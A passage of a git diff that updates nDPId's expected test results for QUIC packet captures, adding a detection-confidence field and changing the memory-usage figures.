-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1592388075915,"flow_last_seen":1592388084373,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1330,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":582,"midstream":0,"ts_msec":1592388084373,"l3_proto":"ip6","src_ip":"3ef4:2194:f4a6:3503:40cd:714:57:c4e4","dst_ip":"2f3d:64d1:9d59:549b::200e","src_port":64229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
+00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1592388075915,"flow_last_seen":1592388084373,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1330,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":582,"midstream":0,"ts_msec":1592388084373,"l3_proto":"ip6","src_ip":"3ef4:2194:f4a6:3503:40cd:714:57:c4e4","dst_ip":"2f3d:64d1:9d59:549b::200e","src_port":64229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic-27.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 20/20
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4600962 bytes
-~~ total memory freed........: 4600962 bytes
-~~ total allocations/frees...: 99586/99586
+~~ total memory allocated....: 4685915 bytes
+~~ total memory freed........: 4685915 bytes
+~~ total allocations/frees...: 101176/101176
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
 ~~ json string max len.......: 2272 chars
diff --git a/test/results/quic-28.pcap.out b/test/results/quic-28.pcap.out
index 908225ab5..fcfa17b13 100644
--- a/test/results/quic-28.pcap.out
+++ b/test/results/quic-28.pcap.out
@@ -1,10 +1,10 @@
 00439{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-28.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591267474847,"flow_last_seen":1591267474847,"flow_idle_time":180000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"ts_msec":1591267474847,"l3_proto":"ip4","src_ip":"10.9.0.2","dst_ip":"104.26.11.240","src_port":60106,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591267474847,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1242,"pkt_l4_len":1208,"ts_msec":1591267474847,"pkt":"7jdRvai\/bmImQfCgCABFAATMbsBAAEARSUwKCQACaBoL8OrKAbsEuILewf8AABwQgoOBp4aIL+MPCXOdR4KiFxRAxLpnL0UX1efsgg\/VSxB4df2ozABEgmEZ7SPB63FDIt1\/BNmaABrW7\/a2mJ6Qg87qxio5qp+Au1rZycjjs1xq27TUqOstzWUVkmwpCYXpvpOqlbwTvnFsXueqMWKDAlTPVsrztIv2pHHHaD8h888fq\/JGG\/YMsyu4siFFo62sUPCzYnviiGb9Ejlp4qwUTq4AjO99Rthdv2GbNC\/OStXSWSDjD\/leZL9UJEZcJ3LhlgqAVgxUVrxuE0rbeF3i8aF9iakAqxlqpoDj1+5t7ILe8xHKg8FUG1XnL5zpn1\/qeTvTEm18Ejt5DZJvb7rSMM3y0kFKOsdK3+oTGrisBL0Fe\/eBZ9f4xHzZvM5y3BCl2N6qMFMX+sMnr8ggfIKSQlAxo6qy68ZM170NeiI1bIaY98nIrG3zZt3dnHbbcgfFiN6lFzYaQLJBtV\/WEYTHy0okUamYC\/5cNM9tSXVBXfneC5HIpPjBuuyE4+LzF5EWg6rp8zulZ5VOTIetNIdJsnU+GlxyeY+BVtCQCCyWElUlL9X91YgIZ8MpCHxRq8ZJCkmY4nF34gFHgfsegffKnBAav99zdzm50AvMu4lP1B1F6cRA2HMPmAvCgUL1IKMcacz2eCZBB7FWHguZbpDdL2+wruFSVOAWeB+lE\/kuyF3MF8D5tAMKtEitOKdhqy3C3qGvZcZVGOZKPWGr2BC7JbZdFGIyYmNwp\/bvvX8XvDggJHwe6xhqAz5sua3BsvUJ1vySN4kKaHQ3EYKLbPPRjDwQinHrO49sFr8oWJyt7OK1yq06uwrlP3p4sqV3\/tL4FsOHtHVAI5LvRB8KISYciiug2cmuSgzkDgaTo\/e3D\/u+rCXDQ3xoip3ktBsckfTnGfFRGZIYxKdaQnHhOXiTzFQ6mSTNof1wHefWEQube1a92cmaAPSGQOt3LWbH6N8\/qM1mTakjE+QJv0K3HWVx+nbk2qFqJc+rHv1Ie37Z2+wHGh0NjwgX3P+8AdCqq6tgRzOpAdLNRrnirmseM\/zZQ0+cDRuw83pFP+UWZ+PCK3wKRZu1IhQ2h6D6lcGAbZA9ehc5yOvz0v1LsR84aEk1FsEGNTqF56I+GB\/2xRH4N5F5aeUjnenJzGpEQkofmIzcU+knq+dcQuuDHuOTLNDIaiPO+4HYzT5IY6vCSgCHcPgQVRcUuuSg\/GpGaVSknd81XIsamcRfeqURHQ1MVwmLxgOMP3+I5HFeghmJ+ki2zeRb+13f3SNlS\/RoVNOTrzjA86oM8wlv5t\/i38dgJDMR2ZvO+tz4iV7y7Y3T7RFYvvK2F7LLOH5ZrOKSeJb1SNqfpAw6nEHN8am8q6WcZIClcZqDQiuuDV2HpT1RM8QezzenJxkksNL2P07lZwI9HU4P7Ayp4wWZ6zeiRYoRywRS5R5VWfF7StuaGYuXatUeylxdjHJ8UwmFRvFoXP+8SlDa8jkz\/qhABAK7x0AzjsV\/3jzRSi1nVL9yl92ydFm7OXWFMLaMdafTsMx6SG3eTR9qPpGQqQKfrm9F1wk7utXsAM9DKqSLm\/MYVhMIgqodecjchaLAXg4QPX1N"}
-00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591267474847,"flow_last_seen":1591267474847,"flow_idle_time":180000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"ts_msec":1591267474847,"l3_proto":"ip4","src_ip":"10.9.0.2","dst_ip":"104.26.11.240","src_port":60106,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Cloudflare","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.wireshark.org","version":"TLSv1.3","alpn":"h3-28,h3-27","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}}
+00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591267474847,"flow_last_seen":1591267474847,"flow_idle_time":180000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"ts_msec":1591267474847,"l3_proto":"ip4","src_ip":"10.9.0.2","dst_ip":"104.26.11.240","src_port":60106,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Cloudflare","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.wireshark.org","version":"TLSv1.3","alpn":"h3-28,h3-27","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1591267474861,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1591267474861,"pkt":"bmImQfCg7jdRvai\/CABFAABL8YhAADkR0gRoGgvwCgkAAgG76soANzParQAAAAAUQMS6Zy9FF9Xn7IIP1UsQeHX9qMwQgoOBp4aIL+MPCXOdR4KiF\/8AABs="}
 02056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1591267474861,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1242,"pkt_l4_len":1208,"ts_msec":1591267474861,"pkt":"7jdRvai\/bmImQfCgCABFAATMbsJAAEARSUoKCQACaBoL8OrKAbsEuILewv8AABsQgoOBp4aIL+MPCXOdR4KiFxRAxLpnL0UX1efsgg\/VSxB4df2ozABEgps603pxkyOuWqOuDCBHqFD5j6Z3HbedH1LdiS7r9g7eF1q+4GbQDzwEnV9STArM0Em4niSxcOP14YGEMbCxBeurtCEC8Tmf6DBDqyOKEQqlh98RR0FuyctJCM99u6oRT6urYJjdL6PSSu3YTL8HY6NviKj+LkpdTz6KmCgYvbgKd7NEhPEXmVYO+dL7mTC6YtcnEsrAHQU704mlKvqtFGL2\/5msnq\/TWBIk6bybV0DxYkGzE2Dnlwtw+dvrt9SpZJQBYmvuqQWRkw7Xl0Ri5Ou\/YH0Nf3CEwfW93dKkzcyI\/xYg9i+2QKy1ICjIZ\/JAWTdEHFRK8O6Gl0vStYOHFWBxnM\/YifVgYZg0OsrKE2RfzjKKmCKUpNz\/eEInpy3g7Oy6BASDjgCLyqH4KHC0RkRyxMeAwO\/4Ueuev5PR+GIZT6RPX+8eDG+GEJz8bGHJ80oLKupj5MfUtk1+qegg2dzVfHgOvprBxIArXCNmBUVNivV7wlObqf87COabZiPrwNrq3bed\/ALhpVnLbXDu3mPYFozof6hWLQUSRUCvRIP+L3zyyxfAOLZZ711TySAZxpgSSNbMb5wMga2ZxBCZGIiJBujBs0RFh65ea1D90334s1gOATeyFD6G0Y5nni0vv93RqV0rCUx5NmKsmees6Lb5Tn92zzlLElQ0tJj8i0NV+A1o9UmRJisTfKPDHGhnjIKCy7tWmA\/6WnyjC5MVpEofvbOp6VSLzrYFEbs4xO0nP5EWcI9akrhkBkR4BVPvA3BR\/JNC6qdA6XjZq7vEC4PK42e5TCzz\/lS4AoqV6qY+iOUqeRm\/KZeFGwLXw2YBxOFGvLQSYLCrM0JT+ZZ\/+YM0cgNTb4UsfslWeAa\/dEDn2K0d5vlVIufoqB2DscZriUDfkBrMe3p2BYO28jOG0dIt\/\/+wVszbGGjaG2DAkiTDrcM67+fz7k2j14PiNbU6+l0I0CfyoRbB67XXdFnPllMtNEGiR4aBRcQCCchbCVwdD7xGfKg8VLCKykEzUES\/y7hiagE2xpKTSbAUtzMYTnIbSLikbFGyfUOpyFdt16r3gk3qkldqup8CI9vmdvD1rvxsFHFdQKlm4ct28WVqNsM7AcMCYS4IdY3fjlHdgQeFzGauOLiE2HquU8FAgRipNJCs2vXSgmlj6qxAuSretb3YYCFUtS5vV7VhzZ\/si5aRaf72K7CkGDHBs9yzIrPzdtDp1CIjAcpqkTgTiqw5a7bneWQdm6knt9coPgKABTdfR1Wfei0Q3edydbubwRd1QyG5zjI0T9bXVZf85BmVvZ\/oiH86E0oC1c6Hyl3M4ke1W9+ncVNagK7XEVU\/lQ9u6NvkLWq7c7LzCfIQKMjglkD6IZxuZzbgX+IVXu+2\/W0iJnR1BIZqRhI1sURkCMk5kSbefJtA\/3ss1rR1eV5WU9Nj63Lk8fki45wlDZBMYeXWKNBze+M4K2DVnLaUMILrXDsu6YTHRFaaXufk6rRMF0IUC\/p6LhqvtpFhBb7T6xRXz1tVkXrpMYBZz4xjGSbfGjFB"}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":253,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":253,"flow_first_seen":1591267474847,"flow_last_seen":1591267477602,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":236167,"flow_avg_l4_payload_len":933,"midstream":0,"ts_msec":1591267477602,"l3_proto":"ip4","src_ip":"10.9.0.2","dst_ip":"104.26.11.240","src_port":60106,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Cloudflare","breed":"Acceptable","category":"Web"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":253,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":253,"flow_first_seen":1591267474847,"flow_last_seen":1591267477602,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":236167,"flow_avg_l4_payload_len":933,"midstream":0,"ts_msec":1591267477602,"l3_proto":"ip4","src_ip":"10.9.0.2","dst_ip":"104.26.11.240","src_port":60106,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Cloudflare","breed":"Acceptable","category":"Web"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":253,"source":"quic-28.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 253/253
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4607542 bytes
-~~ total memory freed........: 4607542 bytes
-~~ total allocations/frees...: 99818/99818
+~~ total memory allocated....: 4692495 bytes
+~~ total memory freed........: 4692495 bytes
+~~ total allocations/frees...: 101408/101408
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
 ~~ json string max len.......: 2061 chars
diff --git a/test/results/quic-29.pcap.out b/test/results/quic-29.pcap.out
index 0bc7707e5..2340ed565 100644
--- a/test/results/quic-29.pcap.out
+++ b/test/results/quic-29.pcap.out
@@ -1,10 +1,10 @@
 00439{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-29.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592171671664,"flow_last_seen":1592171671664,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1592171671664,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":36588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02123{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592171671664,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1592171671664,"pkt":"bmImQfCg7jdRvai\/CABFAAUA8Z1AAEARMDsKCQABCgkAAo7sAbsE7BkSwv8AAB0S824HvwtwiO8oxx1Iisqv85\/8EUOUTtoYvrflSLONN1vzwqO8AES3Q7WQp5eFbP47Q12xYKXOiuR8OKc8Zd+z5\/wDTiaB2gylmmpfXoWWnW9m4cfo29uCTrqUeoQcDlNjFKjOZThrp+QrfaDvzF+TP2mbdVAn5DVFyc3TGw9yc6eNagzixiAUYroBLFYv1DYB54ctmkUUCF38C+LrP5XSP2Zcs3QEOQDdiNvhWKUx+vneyJD2Ddv1Of313oIRItyeXVn2LxKac2RjP4PRAhodOpWDrnkB66u8HOFxUv4Q9HU8anll\/ZatcRtN\/kzzFFzf5YoYXwbtiynEhfyRDYp9NIa5aU5ngHDoeAIY8EqAjkZzDBZrpJEN70XKdgxbZ09x248vkii\/BYPsm8gwjS+Z+NMDUp5BndSqJan6LYduiBKS1FQ2ECMHPifIAeRkFfGsYIjcHELHJvd3bjIuQ5jcLDQ11GM29Aqw0CMdlCZ0GZUFJPoOBYtbWkB+AArzMv7l1fpdC85LE6kYaNSupy\/kxn4q0Fd9nlOil4czF7np40hmUQT5zuUOIMe57G4ak0l7jLPPFgnjPcuJ5+bhZHgxqEou6YPiVeaRUocITEWkE47FVdJ4XctN7CMWrbtrVTRyiKoG5jKjipRDy+FAnWpWY5dsQU4VKty4nhdiXpcyaazCMiTBlzAZlJ+9vVzyUo2gVZTdT1AmyQCJjmCzYg+wq4NqxE5hDx4BVlFY7VlIfT+LOXZeM++nsIOJaY7JaSW2i+1ji7jGvwvZ+l6xB5JTnisqnUTdF8GRkRAiTg25HBspHwtWrq\/Po4lqvzDZYM3JiaCh5C8UbvK9JJyDT8vEGu5LZu4vyW+zCsCEy6HtYm+Tl+y0wBH9TYuhybK9k4L\/MkebKAkQQeZPvBNwHsBWnmGK44Fke47qlm10TFPJJuYjv3s2WkxpofqtAF0qtGkvoZjB6BMweDMLBzljRd+MpcpgKx6R7LMPjs6dfEoyR\/++4fMZPmZ5nKh9L2NomKnJgnI\/Q7cjkj8+4G7DpTq\/5CiPCn768EbsWDr31eOflbsg2q5K0cAqBbvuSWrrcKEWWT9pbchcsh+CF4s8+eUg6FJomv69IBBZDRAHTYWn3VGlccxntEoW7HpxMfIbSnMt1P6bfNeHK9ADAu1LaTZlKkjjmK+gbjyes7l1CGt0SYwE5uDE0ieZjOn+NT2n96TJjl6343hGsZGGMospEVXz6DJx68jscskAGRLftunAK4Wcrbm0MVyZUbf68HXckrAHSl5ZN\/gbwXjHwC\/6kW\/aiMNhQdY8NhboJQcKwTMbOAeVwKF1KGzLGKNIqA8cRIBh1T1WLCqei3k8gd\/C7bxKNgXzYeJGw\/scGAKCWrce0B8GF8XORgu1hVv6Mwd\/suBo\/oG9g9Uq0JP+2Gj4EQHkZYzIbeC00Rkd0VLJzec5p8sOl7k1oJ2JxQnDqWq6c8EgrVrSv8x08C46hCl\/izdOK7GvwGEQaUkOOkL0AriEREHoeCFJRFtP85AqwidJch8tbK+7ugQPN0bUklhiKNfnQ3Ch72i6f0K8Dx8w3Oub6KBk7WsmEtFBIijRDgwb5rVjtiIuJyF+6hegy2WW6xf3iWQ7NMMjWxMe231j5YtMgDPBTVbFARaKzxZnq\/YZAw=="}
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592171671664,"flow_last_seen":1592171671664,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1592171671664,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":36588,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"localhost","version":"TLSv1.3","alpn":"h3-29","ja3":"b3e43d74f4b790abca2f5fe7dd06e7cf","tls_supported_versions":"TLSv1.3"}}
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592171671664,"flow_last_seen":1592171671664,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1592171671664,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":36588,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"localhost","version":"TLSv1.3","alpn":"h3-29","ja3":"b3e43d74f4b790abca2f5fe7dd06e7cf","tls_supported_versions":"TLSv1.3"}}
 00587{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592171671665,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":159,"pkt_l4_len":125,"ts_msec":1592171671665,"pkt":"7jdRvai\/bmImQfCgCABFAACRmvtAAEARi0wKCQACCgkAAQG7juwAfRSj8P8AAB0RQ5RO2hi+t+VIs403W\/PCo7wSLpoy7UXJBmrU+awywdI8GeSAtpBzddspmsO4wBFhAc+lOZRs3AvW96rBMIqSb8d5pE1izlVnQvJ\/MknH+txz1mHxROZRbUIezbGG599\/tfDcAoDEnt9M4O+IUzLE"}
 02128{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592171671666,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1592171671666,"pkt":"bmImQfCg7jdRvai\/CABFAAUA8Z5AAEARMDoKCQABCgkAAo7sAbsE7BkSzv8AAB0SLpoy7UXJBmrU+awywdI8GeSAEUOUTtoYvrflSLONN1vzwqO8O7aQc3XbKZrDuMARYQHPpTmUbNwL1veqwTCKkm\/HeaRNYs5VZ0LyfzJJx\/rcc9Zh8UTmUW1CHs2xhuffRHwK3nve7Gs3tZecUJrzqDFyJk9VgauDIb0Z+rvJbpolNkK6o7LgasAqmBRAbZcMPXVvUfKsLiSsD4SILcWD+XvuWr3Bh6tm+Qfkza+b6iZPubm3DVwSuys\/Xdp90g3J3Xk1P0fVr4\/DBW7XGGDkoxhXT\/JK9l4UPRIVyi5S\/s\/HCP+EDwylk5NF4afjQaGSFHvpGz1rfWgSbWW9+sMKYreG0NJGBDTiOkzrmoNuPwZsLcClKrT8DHkz+OgR9k4HlGmCBbxjhS5EqHAPTN0p9tNIZWR+C\/qUiEONzWWHajForYbyQn2DUiK6yBo+OQYvqxa3oZpGE1ifu6+st0otshaii7hYat8QkKrneLy15mdLcw7PZ9xSTYArs9hr4+vj1cqKUtxqRPTiLF4dCvRIhEX4wsiVHTQs1H5VlPwKxJq579LyeS+qFj4KdmvZBFiZFw+OSy3NncA0jvHpvDNazCZw8\/tYybqvtyop8EVUiQlHyJg8YNQ+aWO8ypOTwvNIGYKTaPxXZMvN35yLXrvtf4haVdzH0G1+kC1uUCGWP2BWNjQ\/TVG8grG7RsHGbnZn8RfXhU4qdScFjhJ31TwgAH0lYn4+u9lnJAIs5sT9WTUkrdZcS\/sM3LeHI6MKWpycP8D28jlxLUcx\/dMgCF27Jh3BsCbctlNdL8hYW38Zr2U49ykd7WZpXsGAA1nzsNfuIwfkQE4VyGHnLjXrXxRxrD6N7QDeL7eK3kUjZyC5W534QYFYrh0HWuZfiukwt3neFrc0vgyMMdUKTmaa96v1P5OJVaakJ7Ko50Ic\/ccvWMdP83+NPcs+7HRXK4yG1yRzMwkmF0e\/57Dhb4ZsYBnI3JAGnaJwAbPLn7nBCtX11JVis76ALA\/EFVyoyCMj1RVsAHT\/DccWKXtdquQdm5INifNuOA564SVFMA0ccofKzicAZJiC7kfXk6QXdl0MLrIa5kBoBc0Jy5c\/hRqi1jxPFSJ4InRQNc9l\/l2XOPXUXc7GNf40YnCF9ge02seRVw5QgAxzztym8sQ\/GYuUd0UgGwdukDWiwqiuJGtn0Mf0hSpoDxXo0GxXy5ROaCq+Yj9+rOhxfWf+y2j1esQpB+lboWDqRNGPph3H9QluST7Lui0v+n2oEV84+fsaSRoIRNleP\/qkuvCpXsIrFGtk7NdB1Z8Zdm3+Q8oB0824BsnbIqBS6PVSMa5uQ7IDT19Rii201P9HjbIFdWd6f4nkoa7QLBzeQZCl5mk4NmwWPlKeVRJy8VolVes2J755oyt5f4B18ZbY7A13RZDfxUDmg9vvPRXS5gGtrj7EEBsE5b+jNiBsYGPfCajHLvvXuZJzWTgs5GIF2fZMlW3pKokAdhk\/JtyHS9+vfZXldxcnCxBcwh\/+X5Jvp0OY666uN2Hix0VsHswxfto+CE3l1fROmKv5hQv6DrppojEXU\/Bywn1HyxPBMx4G4LIAeSl0XzQ9LpI\/snJgv3oFDbMQMXW6dKIL6toQLmRPmeW2MoTht4gvwKXj8RRQP4umFHd\/MZAMVQ=="}
-00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1592171671664,"flow_last_seen":1592171671699,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":583,"midstream":0,"ts_msec":1592171671699,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":36588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1592171671664,"flow_last_seen":1592171671699,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":583,"midstream":0,"ts_msec":1592171671699,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":36588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"quic-29.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 15/15
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4600686 bytes
-~~ total memory freed........: 4600686 bytes
-~~ total allocations/frees...: 99580/99580
+~~ total memory allocated....: 4685639 bytes
+~~ total memory freed........: 4685639 bytes
+~~ total allocations/frees...: 101170/101170
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
 ~~ json string max len.......: 2133 chars
diff --git a/test/results/quic-33.pcapng.out b/test/results/quic-33.pcapng.out
index 2ac82c8db..3e635a15c 100644
--- a/test/results/quic-33.pcapng.out
+++ b/test/results/quic-33.pcapng.out
@@ -1,10 +1,10 @@
